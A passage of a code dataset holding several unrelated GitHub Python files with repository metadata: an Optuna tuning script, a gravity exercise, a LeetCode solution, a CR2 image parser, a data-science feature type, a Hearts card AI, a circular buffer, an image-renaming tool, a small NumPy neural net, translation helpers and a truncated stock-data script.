executor.run()\n\n\ndef main(\n    config_path: str,\n    serialization_dir: str,\n    num_trials: int = 500,\n    n_jobs: int = 1,\n    timeout: int = 60 * 60 * 48,\n    study_name: str = \"optuna_fraud\"\n):\n    study = optuna.create_study(\n        storage=\"sqlite:///result/final_classifier.db\",\n        sampler=optuna.samplers.TPESampler(seed=245),\n        study_name=study_name,\n        pruner=optuna.pruners.HyperbandPruner(),\n        direction=\"maximize\",\n        load_if_exists=True,\n    )\n\n    objective = partial(fraud_objective, config_path=config_path, serialization_dir=serialization_dir)\n    study.optimize(\n        objective,\n        n_jobs=n_jobs,\n        n_trials=num_trials,\n        timeout=timeout,\n    )\n\n\nif __name__ == \"__main__\":\n    typer.run(main)\n","repo_name":"fursovia/fraud_detection","sub_path":"fraud/run_optuna.py","file_name":"run_optuna.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"16076177958","text":"# Do not modify these lines\n__winc_id__ = '7b9401ad7f544be2a23321292dd61cb6'\n__human_name__ = 'arguments'\n\n# Add your code after this line\n\n#part 1 Greet template\ndef greet (name = 'dibbes', template = \"Hello, <name>!\"):\n    return template.replace('<name>', name)\n\n\n#part 2 Force\ndef force (mass = 0.0, body = 'earth'): #surface gravity of planets & the sun\n    planet = {\n        'sun': 274,\n        'jupiter': 24.9,\n        'neptune': 11.2,\n        'saturn': 10.4,\n        'earth': 9.8,\n        'uranus': 8.9,\n        'venus': 8.9,\n        'mars': 3.7,\n        'mercury': 3.7,\n        'moon': 1.6,\n        'pluto': 0.6 \n    }\n    return round(mass*planet[body],1)\n\n\n#part 3 \ndef pull (m1, m2, d):\n    G = 6.674 * (10 ** -11) #this is the gravitational constant\n    return G * ((m1 * m2) / (d ** 2)) #this is the gravitational pull \n    \n    \nprint (greet(\"Marcel\", \"What's up, <name>!\"))\nprint (greet(\"Marcel\"))\nprint (greet())\n\nprint (pull(0.1, 5.972 * 10 ** 24, 6371)) #https://www.mathsisfun.com/physics/gravity.html","repo_name":"Verheij22/AssignmentArguments","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11207477010","text":"class Solution:\n    def largestValsFromLabels(self, values: List[int], labels: List[int], numWanted: int, useLimit: int) -> int:\n        setsize,scorenum,d = 0,0,{}\n        for v, l in sorted([[values[i], labels[i]] for i in range(len(values))], reverse = True):\n            d[l] = d.get(l, 0) + 1\n            if d[l] <= useLimit:\n                scorenum,setsize= scorenum+v,setsize+1\n            if setsize == numWanted:\n                return scorenum\n        return scorenum","repo_name":"ls1248659692/leetcode","sub_path":"spider/problems/1090-largest-values-from-labels/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":595,"dataset":"github-code","pt":"38"} +{"seq_id":"18608490086","text":"\"\"\"\nCanon CR2 raw image data, version 2.0 image parser.\n\nAuthors: Fernando Crespo\nCreation date: 21 february 2017\n\"\"\"\n\nfrom hachoir.parser import Parser\nfrom hachoir.field import SeekableFieldSet, RootSeekableFieldSet, Bytes, String, UInt8, UInt16, UInt32\nfrom hachoir.core.endian import LITTLE_ENDIAN, BIG_ENDIAN\nfrom hachoir.core.text_handler import textHandler, hexadecimal\nfrom hachoir.parser.image.exif import IFD, IFD_TAGS\n\n\ndef getStrips(ifd):\n    data = {}\n    for i, entry in enumerate(ifd.array('entry')):\n        data[entry['tag'].display] = entry\n    # image data\n    if \"StripOffsets\" in data and \"StripByteCounts\" in data:\n        offs = 
ifd.getEntryValues(data[\"StripOffsets\"])\n bytes = ifd.getEntryValues(data[\"StripByteCounts\"])\n for off, byte in zip(offs, bytes):\n yield off.value, byte.value\n\n\nclass ImageFile(SeekableFieldSet):\n\n def __init__(self, parent, name, description, ifd):\n SeekableFieldSet.__init__(self, parent, name, description, None)\n self._ifd = ifd\n\n def createFields(self):\n for off, byte in getStrips(self._ifd):\n self.seekByte(off, relative=False)\n yield Bytes(self, \"strip[]\", byte)\n\n\nclass CR2File(RootSeekableFieldSet, Parser):\n PARSER_TAGS = {\n \"id\": \"cr2\",\n \"category\": \"image\",\n \"file_ext\": (\"cr2\",),\n \"mime\": (\"image/x-canon-cr2\",),\n \"min_size\": 15,\n \"magic\": ((b\"CR\", 8),),\n \"description\": \"Canon CR2 raw image data, version 2.0\"\n }\n\n # Correct endian is set in constructor\n endian = LITTLE_ENDIAN\n\n def __init__(self, stream, **args):\n RootSeekableFieldSet.__init__(\n self, None, \"root\", stream, None, stream.askSize(self))\n if self.stream.readBytes(0, 2) == b\"MM\":\n self.endian = BIG_ENDIAN\n Parser.__init__(self, stream, **args)\n\n def validate(self):\n endian = self.stream.readBytes(0, 2)\n if endian not in (b\"MM\", b\"II\"):\n return \"Invalid endian (%r)\" % endian\n if self[\"version\"].value != 42:\n return \"Unknown Canon TIFF version - \" + str(self[\"version\"].value)\n if self[\"cr_identifier\"].value != \"CR\":\n return \"Unknown Canon Raw File\"\n return True\n\n def createFields(self):\n iff_start = self.absolute_address\n yield String(self, \"endian\", 2, \"Endian ('II' or 'MM')\", charset=\"ASCII\")\n if self[\"endian\"].value == \"II\":\n self.endian = LITTLE_ENDIAN\n else:\n self.endian = BIG_ENDIAN\n\n yield UInt16(self, \"version\", \"TIFF version number\")\n yield UInt32(self, \"img_dir_ofs\", \"Next image directory offset\")\n\n yield String(self, \"cr_identifier\", 2, \"Canon Raw marker\", charset=\"ASCII\")\n yield UInt8(self, \"cr_major_version\", \"Canon Raw major version number\")\n yield UInt8(self, \"cr_minor_version\", \"Canon Raw minor version number\")\n\n yield textHandler(UInt32(self, \"cr_raw_ifd_offset\", \"Offset to Raw IFD\"), hexadecimal)\n\n offsets = [(self['img_dir_ofs'].value, 'ifd[]', IFD)]\n\n while offsets:\n offset, name, klass = offsets.pop(0)\n self.seekByte(offset + iff_start // 8, relative=False)\n ifd = klass(self, name, iff_start)\n\n yield ifd\n for entry in ifd.array('entry'):\n tag = entry['tag'].value\n if tag in IFD_TAGS:\n name, klass = IFD_TAGS[tag]\n offsets.append((ifd.getEntryValues(entry)[\n 0].value, name + '[]', klass))\n if ifd['next'].value != 0:\n offsets.append((ifd['next'].value, 'ifd[]', IFD))\n\n for ifd in self.array('ifd'):\n offs = (off for off, byte in getStrips(ifd))\n self.seekByte(min(offs), relative=False)\n image = ImageFile(self, \"image[]\", \"Image File\", ifd)\n yield image\n","repo_name":"SickGear/SickGear","sub_path":"lib/hachoir/parser/image/cr2.py","file_name":"cr2.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"38"} +{"seq_id":"40885692964","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom ads.feature_engineering.feature_type.base import FeatureType\nfrom ads.feature_engineering.utils import (\n _add_missing,\n _set_seaborn_theme,\n SchemeTeal,\n _format_stat,\n)\nfrom ads.feature_engineering import schema\nfrom ads.common.decorator.runtime_dependency import (\n runtime_dependency,\n OptionalDependency,\n)\n\n\nclass 
Integer(FeatureType):\n \"\"\"\n Type representing integer values.\n\n Attributes\n ----------\n description: str\n The feature type description.\n name: str\n The feature type name.\n warning: FeatureWarning\n Provides functionality to register warnings and invoke them.\n validator\n Provides functionality to register validators and invoke them.\n\n Methods\n --------\n feature_stat(x: pd.Series) -> pd.DataFrame\n Generates feature statistics.\n feature_plot(x: pd.Series) -> plt.Axes\n Shows distributions of datasets using box plot.\n \"\"\"\n\n description = \"Type representing integer values.\"\n\n @staticmethod\n def feature_stat(x: pd.Series) -> pd.DataFrame:\n \"\"\"Generates feature statistics.\n\n Feature statistics include (total)count, mean, standard deviation, sample minimum,\n lower quartile, median, 75%, upper quartile, max and missing(count) if there is any.\n\n Examples\n --------\n >>> x = pd.Series([1, 0, 1, 2, 3, 4, np.nan], name='integer')\n >>> x.ads.feature_type = ['integer']\n >>> x.ads.feature_stat()\n Metric Value\n 0\tcount\t 7\n 1\tmean\t 1\n 2\tstandard deviation\t 1\n 3\tsample minimum\t 0\n 4\tlower quartile\t 1\n 5\tmedian\t 1\n 6\tupper quartile\t 2\n 7\tsample maximum\t 4\n 8\tmissing\t 1\n\n Returns\n -------\n :class:`pandas.DataFrame`\n Summary statistics of the Series or Dataframe provided.\n \"\"\"\n df_stat = x.describe()\n _format_stat(df_stat)\n df_stat[\"count\"] = len(x)\n df_stat = _add_missing(x, df_stat).to_frame()\n df_stat.iloc[:, 0] = df_stat.iloc[:, 0]\n return df_stat\n\n @staticmethod\n @runtime_dependency(module=\"seaborn\", install_from=OptionalDependency.VIZ)\n def feature_plot(x: pd.Series) -> plt.Axes:\n \"\"\"\n Shows distributions of datasets using box plot.\n\n Examples\n --------\n >>> x = pd.Series([1, 0, 1, 2, 3, 4, np.nan], name='integer')\n >>> x.ads.feature_type = ['integer']\n >>> x.ads.feature_plot()\n\n Returns\n -------\n matplotlib.axes._subplots.AxesSubplot\n Plot object for the series based on the Integer feature type.\n \"\"\"\n col_name = x.name if x.name else \"integer\"\n df = x.to_frame(name=col_name)\n df = df[pd.to_numeric(df[col_name], errors=\"coerce\").notnull()]\n if len(df.index):\n _set_seaborn_theme()\n return seaborn.boxplot(\n x=df[col_name], width=0.2, color=SchemeTeal.AREA_DARK\n )\n\n @classmethod\n def feature_domain(cls, x: pd.Series) -> schema.Domain:\n \"\"\"\n Generate the domain of the data of this feature type.\n\n Examples\n --------\n >>> s = pd.Series([True, False, True, False, np.NaN, None], name='integer')\n >>> s.ads.feature_type = ['integer']\n >>> s.ads.feature_domain()\n constraints: []\n stats:\n count: 6\n freq: 2\n missing: 2\n top: true\n unique: 2\n values: Integer\n\n\n Returns\n -------\n ads.feature_engineering.schema.Domain\n Domain based on the Integer feature type.\n \"\"\"\n\n return schema.Domain(cls.__name__, cls.feature_stat(x).to_dict()[x.name], [])\n","repo_name":"oracle/accelerated-data-science","sub_path":"ads/feature_engineering/feature_type/integer.py","file_name":"integer.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"38"} +{"seq_id":"8605937664","text":"from __future__ import annotations\nfrom cards import Card, Rank, Suit\n\nclass BasicAIPlayer:\n\n\tdef __init__(self, name: str):\n\t\tself.name = name\n\t\tself.hand = []\n\t\tself.round_score = 0 \n\t\tself.total_score = 0\n\n\tdef __str__(self) -> str:\n\t\treturn self.name\n\n\tdef __repr__(self) -> str:\n\t\treturn 
self.__str__()\n\n\tdef play_card(self, trick: list[Card], broken_hearts: bool) -> Card:\n\t\t# lowest_card = Card(Rank.Ace, Suit.Hearts)\n\n\t\tself.hand.sort()\n\t\tfor i in self.hand:\n\t\t\tif self.check_valid_play(i, trick, broken_hearts)[0] == True:\n\t\t\t\tself.hand.remove(i)\n\t\t\t\treturn i\n\n\t\t# lowest_card = Card(Rank.Ace, Suit.Hearts)\n\n\t\t# for i in self.hand:\n\t\t# \tif self.check_valid_play(i, trick, broken_hearts)[0] == True:\n\t\t# \t\tif i < lowest_card: \n\t\t# \t\t\tlowest_card = i \n\n\t\t# self.hand.remove(lowest_card)\n\t\t# return lowest_card\n\n\tdef pass_cards(self) -> list[Card]:\n\t\thighest_cards = []\n\n\t\tfor i in range (3):\n\t\t\tcurrent_max = max(self.hand)\n\t\t\thighest_cards.append(current_max)\n\t\t\tself.hand.remove(current_max)\n\t\t\n\t\treturn highest_cards\n\t\t\t\n\tdef check_valid_play(self, card: Card, trick: list[Card], broken_hearts: bool) -> tuple(bool, str):\n\n\t\thas_required_suit = False\n\n\t\tleading = False \n\t\t\n\t\tif len(trick) == 0:\n\t\t\tleading = True\n\t\t\n\n\t\tif leading is True: \t\t\t\t\t\t\t\t\t\t\t\n\t\t\tfor i in self.hand:\n\t\t\t\tif i.suit == Suit.Clubs or i.suit == Suit.Diamonds or i.suit == Suit.Spades:\n\t\t\t\t\thas_required_suit = True\n\n\t\t\tif has_required_suit is True:\n\t\t\t\tif Card(Rank.Two, Suit.Clubs) in self.hand and card != Card(Rank.Two, Suit.Clubs):\n\t\t\t\t\toutput_tuple = (False, \"Player must play Two of Clubs\")\n\t\t\t\telif card.suit.name == \"Hearts\" and broken_hearts == False:\n\t\t\t\t\toutput_tuple = (False, \"Player cannot lead with hearts when Hearts are not broken\")\n\t\t\t\telse: \n\t\t\t\t\toutput_tuple = (True, \"valid play\")\n\t\t\t\n\t\t\telif has_required_suit is False:\n\t\t\t\toutput_tuple = (True, \"valid play\")\n\n\t\telse:\t\n\t\t\tfor i in self.hand:\n\t\t\t\tif trick[0].suit == i.suit:\n\t\t\t\t\thas_required_suit = True\n\n\t\t\tif has_required_suit is True:\n\t\t\t\tif card.suit != trick[0].suit:\n\t\t\t\t\toutput_tuple = (False, \"Player must Follow Suit\")\n\t\t\t\telse: \n\t\t\t\t\toutput_tuple = (True, \"valid play\")\n\n\t\t\telif has_required_suit is False:\n\t\t\t\tif card == Card(Rank.Queen, Suit.Spades) and trick[0] == Card(Rank.Two, Suit.Clubs):\n\t\t\t\t\toutput_tuple = (False, \"Player cannot play Queen of Spades during the first round\")\n\t\t\t\telse:\n\t\t\t\t\toutput_tuple = (True, \"valid play\")\t\t\n\n\t\t# print(\"leading: \" + str(leading))\n\t\t# print(\"has required suit: \" + str(has_required_suit))\n\t\t# print(output_tuple)\n\t\treturn output_tuple\n\nif __name__ == \"__main__\":\n\t# Test your function here\n\t# TASK 2.2 TEST \n\t# player = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand = [Card(Rank.Two, Suit.Hearts), Card(Rank.Ace, Suit.Spades), Card(Rank.King, Suit.Hearts), Card(Rank.Ten, Suit.Hearts)]\n\t# trick, broken_hearts = [], False\n\t# print(player.hand[0])\n\t# print(player.check_valid_play(player.hand[0], trick, broken_hearts))\n\n\t# TASK 2.3 TEST \n\tplayer = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand.append(Card(Rank.Two, Suit.Clubs))\n\t# player.hand.append(Card(Rank.Ace, Suit.Hearts))\n\t# player.hand.append(Card(Rank.King, Suit.Spades))\n\t# player.hand.append(Card(Rank.Ten, Suit.Spades))\n\tplayer.hand = [Card(Rank.Queen, Suit.Clubs),Card(Rank.Three, Suit.Hearts), Card(Rank.Eight, Suit.Hearts), Card(Rank.Nine, Suit.Clubs), Card(Rank.Jack, Suit.Spades), Card(Rank.Two, Suit.Diamonds), Card(Rank.Two, Suit.Spades)]\n\ttrick = [Card(Rank.Three, Suit.Diamonds)]\n\tprint(player.play_card(trick, 
broken_hearts=False))\n\n\t# TASK 2.3.1 TEST\n\t# player = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand = [Card(Rank.Four, Suit.Clubs), Card(Rank.Ace, Suit.Hearts), Card(Rank.King, Suit.Spades), Card(Rank.Ten, Suit.Spades),]\n\t# print(player.pass_cards(player.hand))\n\n\t# player = BasicAIPlayer(\"Test Player 1\")\n\t# player.hand = [Card(Rank.Four, Suit.Clubs), Card(Rank.Ace, Suit.Hearts), Card(Rank.King, Suit.Spades), Card(Rank.Ten, Suit.Spades),]\n\t# print(player.hand)\n\n\t# pass","repo_name":"yuanyi1029/FIT1045","sub_path":"Assignment 2/Hearts/basic_ai.py","file_name":"basic_ai.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29231709031","text":"from threading import Lock, Event\n\n\nclass Timeout(Exception):\n pass\n\n\nclass CircularBuffer(object):\n \"\"\"A circular buffer, accesible via read() and write().\"\"\"\n def __init__(self, size=16384):\n self.size = size\n\n self.rcnt = 0 # Total number of bytes read from the buffer\n self.wcnt = 0 # Total number of bytes written to the buffer\n self.data = self.size * ['\\0']\n\n self.mutex = Lock()\n self.nonempty = Event()\n self.nonempty.clear()\n self.notfull = Event()\n self.notfull.set()\n\n self.blocking = True\n\n def setblocking(self, val):\n self.blocking = bool(val)\n\n def read(self, n):\n \"\"\"Read up to n bytes from the circular buffer.\n\n Read up to n bytes from the circular buffer,\n and return them as a string.\n\n Block if no data are available.\n\n \"\"\"\n while True:\n with self.mutex:\n if self.nonempty.is_set():\n # Determine number of bytes to read\n cur = self.wcnt - self.rcnt\n assert cur > 0\n if n > cur:\n n = cur\n start = self.rcnt % self.size\n end = (self.rcnt + n) % self.size\n\n # Reset the counters\n self.rcnt = start\n self.wcnt = self.rcnt + cur\n\n if start < end:\n data = self.data[start:end]\n else:\n data = self.data[start:] + self.data[:end]\n\n self.rcnt += n\n if cur - n == 0:\n self.nonempty.clear()\n if n > 0:\n self.notfull.set()\n\n return ''.join(data)\n\n # We block without holding the mutex\n if not self.blocking:\n raise Timeout(\"read operation would block\")\n self.nonempty.wait()\n\n def write(self, data):\n \"\"\"Write up to n bytes into the circular buffer.\n\n Write up to n bytes into the circular buffer,\n block if no data are available.\n\n \"\"\"\n n = len(data)\n while True:\n with self.mutex:\n if self.notfull.is_set():\n # Determine number of bytes to write\n cur = self.wcnt - self.rcnt\n left = self.size - cur\n assert cur >= 0\n assert left > 0\n if n > left:\n n = left\n\n start = self.wcnt % self.size\n for i in range(n):\n self.data[(i+start) % self.size] = data[i]\n\n self.wcnt += n\n assert cur + n <= self.size\n if cur + n == self.size:\n self.notfull.clear()\n self.nonempty.set()\n return n\n\n # We block without holding the mutex\n if not self.blocking:\n raise Timeout(\"write operation would block\")\n self.notfull.wait()\n\n def readall(self, n):\n pass\n\n def writeall(self, data):\n data_len = len(data)\n n = self.write(data)\n\n while n < data_len:\n n += self.write(data[n:])\n\n assert(n == data_len)\n\n return n\n\n def close(self):\n pass\n\n # Handy aliases\n recv = read\n send = write\n recvall = readall\n sendall = 
writeall\n","repo_name":"grnet/snf-vncauthproxy","sub_path":"vncauthproxy/circbuffer.py","file_name":"circbuffer.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"31166063756","text":"from django import forms\n\nclass Form(forms.Form):\n \n required_css_class = 'required'\n \n def __init__(self, *args, **kwargs):\n if 'label_suffix' not in kwargs:\n # We generally don't want automatic colons after field names\n kwargs['label_suffix'] = ''\n super(Form, self).__init__(*args, **kwargs)\n \n def _html_output(self, *args, **kwargs):\n for field in self.fields.values():\n if field.help_text:\n field.widget.attrs['data-helptext'] = field.help_text\n field.help_text = None\n\n return super(Form, self)._html_output(*args, **kwargs)","repo_name":"michaelmulley/openparliament","sub_path":"parliament/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"38"} +{"seq_id":"39095680888","text":"import sys\nimport math\nimport numpy\n\n\ndef solve(input):\n\tmyString = str(input)\n\tanswerString = ''\n\tfor i in myString:\n\t\tif i == '4':\n\t\t\tanswerString = answerString + '1'\n\t\telse:\n\t\t\tanswerString = answerString + '0'\n\tanswer1 = int(answerString)\n\treturn answer1\n\ndef main(argv):\n\tt = int(input()) # read a line with a single integer\n\tfor i in range(1, t + 1):\n\t\tn = input()\n\t\tprint(\"Case #{}: {} {}\".format(i,solve(n),int(n) - solve(n)))\n \t\t# n = input().split(\" \") # read a list of integers, 2 in this case\n \t\t#print(\"Case #{}: {}\".format(i, n))\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)","repo_name":"robwon/CodeJam","sub_path":"2019/Qualifying Round/Foregone.py","file_name":"Foregone.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"72752904112","text":"import os\nimport argparse\nimport cv2\nfrom tqdm import tqdm\n\ndef change_image_suffix(folder_path, original_suffix, new_suffix):\n for filename in tqdm(os.listdir(folder_path), desc=\"Processing images\"):\n # if filename.endswith(original_suffix):\n original_file_path = os.path.join(folder_path, filename)\n new_filename = filename.replace(original_suffix, new_suffix)\n new_file_path = os.path.join(folder_path, new_filename)\n ori_suf = original_file_path.split(\".\")[-1]\n new_suf = new_file_path.split(\".\")[-1]\n if ori_suf == new_suf:\n os.rename(original_file_path, new_file_path)\n else:\n cv2.imwrite(new_file_path, cv2.imread(original_file_path))\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Change image file extensions in a folder.\")\n parser.add_argument(\"--folder_path\", type=str, help=\"Path to the folder containing images\")\n parser.add_argument(\"--original_suffix\", type=str, help=\"Original image file extension (e.g., .jpg)\")\n parser.add_argument(\"--new_suffix\", type=str, help=\"New image file extension (e.g., .png)\")\n\n args = parser.parse_args()\n\n change_image_suffix(args.folder_path, args.original_suffix, args.new_suffix)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ywher/segmentation_tools","sub_path":"change_file_suffix.py","file_name":"change_file_suffix.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} 
+{"seq_id":"14052111603","text":"#!/usr/bin/python3\n'''\nModule for log parsing\nlog data passed in format:\n - [] \"GET /projects/260 HTTP/1.1\" \n84.27.67.17 - [2023-10-19 10:40:59.756530] \"GET /projects/260 HTTP/1.1\" 200 437\n'''\nimport re\nimport sys\n\n\ndef print_logs(lines, regex, global_log_data):\n '''\n description: function to output global log file data and status logs\n Args:\n lines (list): list of log data\n regex (re.Pattern): patter to extract file size and status code\n return: None\n out format:\n File size: \n : \n : \n if a status code doesn't appear or is not an integer,\n don't print anything for this status code\n '''\n file_sizes_archive = {}\n\n list_status_code_count = []\n\n for line in lines:\n match_data = regex.match(line)\n statu_code, file_size = match_data.group(3), match_data.group(4)\n\n if file_size not in file_sizes_archive:\n file_sizes_archive.update({file_size: {statu_code: 1}})\n else:\n if statu_code not in file_sizes_archive[file_size]:\n file_sizes_archive[file_size].update({statu_code: 1})\n else:\n file_sizes_archive[file_size][statu_code] += 1\n\n for key in file_sizes_archive.keys():\n global_log_data['file_size'] += int(key)\n\n print(f'File size: {global_log_data[\"file_size\"]}')\n\n for value in file_sizes_archive.values():\n for code, count in value.items():\n if code in global_log_data['codes']:\n global_log_data['codes'][code] += count\n else:\n global_log_data['codes'].update({code: count})\n\n for code, count in global_log_data['codes'].items():\n try:\n list_status_code_count.append((int(code), count))\n except TypeError:\n continue\n\n # status codes should be printed in ascending order\n sorted_list = sorted(list_status_code_count, key=lambda item: item[0])\n\n for items in sorted_list:\n print(f'{items[0]}: {items[1]}')\n\n\nif __name__ == '__main__':\n pattern1 = r'^([\\d.]+) - \\[(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}\\.\\d{6})\\]'\n pattern2 = r' \"GET /projects/260 HTTP/1.1\" (\\d{3}) (\\d+)$'\n log_pattern = pattern1 + pattern2\n\n log_regex = re.compile(log_pattern)\n\n global_log_data = {'file_size': 0, 'codes': {}}\n\n line_count = 1\n lines = []\n\n try:\n for line in sys.stdin:\n\n if log_regex.match(line):\n lines.append(line)\n line_count += 1\n\n if line_count % 10 == 0:\n print_logs(lines, log_regex, global_log_data)\n except KeyboardInterrupt:\n print_logs(lines, log_regex, global_log_data)\n","repo_name":"colinochieng/alx-interview","sub_path":"0x03-log_parsing/0-stats.py","file_name":"0-stats.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21424731855","text":"# A neural network which approximates linear function y = 2x + 3.\n# The network has 1 layer with 1 node, which has 1 input (and a bias).\n# As there is no activation effectively this node is a linear function.\n# After +/- 10.000 iterations W should be close to 2 and B should be close to 3.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.set_printoptions(formatter={\"float\": \"{: 0.3f}\".format}, linewidth=np.inf)\nnp.random.seed(1)\n\nX = np.array([[0], [1], [2], [3], [4]]) # X = input (here: 5 values)\nY = 2 * X + 3 # Y = output: y = 2x + 3 (as many values as there are X's)\n\nW = np.random.normal(scale=0.1, size=(1, 1)) # layer: (1, 1) = 1 node with 1 input\nB = np.random.normal(scale=0.1, size=(1, 1)) # bias: (1, 1) = for 1 node (and by definition only 1 bias value per node)\n\nlearning_rate = 0.001\niterations = 
10000\nerror = []\n\nprint(\"initial :\", \"W =\", W, \"B =\", B, \"(random initialization)\")\n\nm = X.shape[0]\n\nfor _ in range(iterations):\n    # forward pass\n    a = W.dot(X.T) + B\n\n    # back propagation\n    da = a - Y.T  # da = error\n    dz = da  # no activation\n    dw = dz.dot(X) / m\n    db = np.sum(dz, axis=1, keepdims=True) / m\n\n    W -= learning_rate * dw\n    B -= learning_rate * db\n\n    error.append(np.average(da ** 2))\n\nprint(\"result  :\", \"W =\", W, \"B =\", B, \"(after {} iterations)\".format(iterations))\nprint(\"expected: W = 2, B = 3\")\n\nplt.plot(range(iterations), error)\nplt.title(\"MSE (mean squared error)\")\nplt.xlabel(\"training iterations\")\nplt.ylabel(\"mse\")\nplt.show()\n","repo_name":"nealholt/python_programming_curricula","sub_path":"CS3/0600_neural networks_handwriting_recognition/numpy_nnet/erikdelange/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"38"} +{"seq_id":"34829195622","text":"import os\nimport pickle\nimport copy\nimport numpy as np\n\n\nCODES = {'<PAD>': 0, '<EOS>': 1, '<UNK>': 2, '<GO>': 3 }\n\n\ndef load_data(path):\n    \"\"\"\n    Load Dataset from File\n    \"\"\"\n    input_file = os.path.join(path)\n    with open(input_file, 'r', encoding='utf-8') as f:\n        return f.read()\n\n\ndef preprocess_and_save_data(source_path, target_path, text_to_ids):\n    \"\"\"\n    Preprocess Text Data. Save it to file.\n    \"\"\"\n    # Preprocess\n    source_text = load_data(source_path)\n    target_text = load_data(target_path)\n\n    source_text = source_text.lower()\n    target_text = target_text.lower()\n\n    source_vocab_to_int, source_int_to_vocab = create_lookup_tables(source_text)\n    target_vocab_to_int, target_int_to_vocab = create_lookup_tables(target_text)\n\n    source_text, target_text = text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int)\n\n    # Save Data\n    with open('preprocess.p', 'wb') as out_file:\n        pickle.dump((\n            (source_text, target_text),\n            (source_vocab_to_int, target_vocab_to_int),\n            (source_int_to_vocab, target_int_to_vocab)), out_file)\n\n\ndef load_preprocess():\n    \"\"\"\n    Load the Preprocessed Training data and return them in batches of <batch_size> or less\n    \"\"\"\n    with open('preprocess.p', mode='rb') as in_file:\n        return pickle.load(in_file)\n\n\ndef create_lookup_tables(text):\n    \"\"\"\n    Create lookup tables for vocabulary\n    \"\"\"\n    vocab = set(text.split())\n    vocab_to_int = copy.copy(CODES)\n\n    for v_i, v in enumerate(vocab, len(CODES)):\n        vocab_to_int[v] = v_i\n\n    int_to_vocab = {v_i: v for v, v_i in vocab_to_int.items()}\n\n    return vocab_to_int, int_to_vocab\n\n\ndef save_params(params):\n    \"\"\"\n    Save parameters to file\n    \"\"\"\n    with open('params.p', 'wb') as out_file:\n        pickle.dump(params, out_file)\n\n\ndef load_params():\n    \"\"\"\n    Load parameters from file\n    \"\"\"\n    with open('params.p', mode='rb') as in_file:\n        return pickle.load(in_file)\n\n\ndef batch_data(source, target, batch_size):\n    \"\"\"\n    Batch source and target together\n    \"\"\"\n    for batch_i in range(0, len(source)//batch_size):\n        start_i = batch_i * batch_size\n        source_batch = source[start_i:start_i + batch_size]\n        target_batch = target[start_i:start_i + batch_size]\n        yield np.array(pad_sentence_batch(source_batch)), np.array(pad_sentence_batch(target_batch))\n\n\ndef pad_sentence_batch(sentence_batch):\n    \"\"\"\n    Pad sentence with <PAD> id\n    \"\"\"\n    max_sentence = max([len(sentence) for sentence in sentence_batch])\n    return [sentence + [CODES['<PAD>']] * (max_sentence - len(sentence))\n            for sentence 
in sentence_batch]\n","repo_name":"udacity/deep-learning","sub_path":"language-translation/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":3967,"dataset":"github-code","pt":"38"} +{"seq_id":"12645868431","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nsamsung = pd.read_csv(\"./data/csv/삼성전자 1120.csv\",\r\n header=0,index_col=0,sep=\",\",encoding='CP949')\r\n\r\n# ==================== samsung x ====================\r\n\r\nsamsung_sort = pd.DataFrame(samsung).sort_values(\"일자\",ascending=[\"True\"])\r\nsamsung_x_row = samsung_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\nsamsung_x_tv = samsung_x_row[\"거래량\"] \r\nsamsung_x_ta = samsung_x_row[\"금액(백만)\"] \r\nsamsung_x_o = samsung_x_row[\"시가\"] \r\nsamsung_x_c = samsung_x_row[\"종가\"]\r\n\r\nfor i in range(len(samsung_x_tv.index)):\r\n samsung_x_tv.iloc[i] = int(samsung_x_tv.iloc[i].replace(\",\",\"\"))\r\n samsung_x_ta.iloc[i] = int(samsung_x_ta.iloc[i].replace(\",\",\"\"))\r\n samsung_x_o.iloc[i] = int(samsung_x_o.iloc[i].replace(\",\",\"\"))\r\n samsung_x_c.iloc[i] = int(samsung_x_c.iloc[i].replace(\",\",\"\"))\r\n\r\nsamsung_x_set = []\r\n\r\nfor j in range(len(samsung_x_tv.index)):\r\n samsung_x_set.append([int(samsung_x_ta.iloc[j]*1000000/samsung_x_tv.iloc[j]),samsung_x_o.iloc[j],samsung_x_c.iloc[j]]) \r\n\r\nsamsung_x = np.array(samsung_x_set)\r\n\r\n# ==================== samsung y ====================\r\n\r\nsamsung_sort2 = 